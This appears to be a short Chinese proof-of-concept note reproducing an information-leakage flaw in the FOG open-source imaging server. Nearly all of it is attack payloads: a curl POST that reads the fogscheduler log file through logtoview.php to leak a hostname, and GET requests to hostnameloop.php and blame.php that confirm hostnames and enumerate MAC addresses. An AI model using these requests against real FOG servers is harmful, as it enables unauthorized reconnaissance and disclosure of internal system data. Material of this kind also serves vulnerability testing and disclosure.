K29-1开源-FOG-InformationLeakage
漏洞复现:
payload:
获取hostname
curl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogscheduler.log&ip=<BASE64_SERVERIP>' $'http://<SERVERIP>/fog/status/logtoview.php'
效果图:

payload:
验证hostname、获取mac地址
GET /fog/service/hostnameloop.php?host=dGVzdGhvc3Q=
payload:
验证mac地址
GET /fog/service/blame.php?mac=aa:aa:aa:aa:aa:aa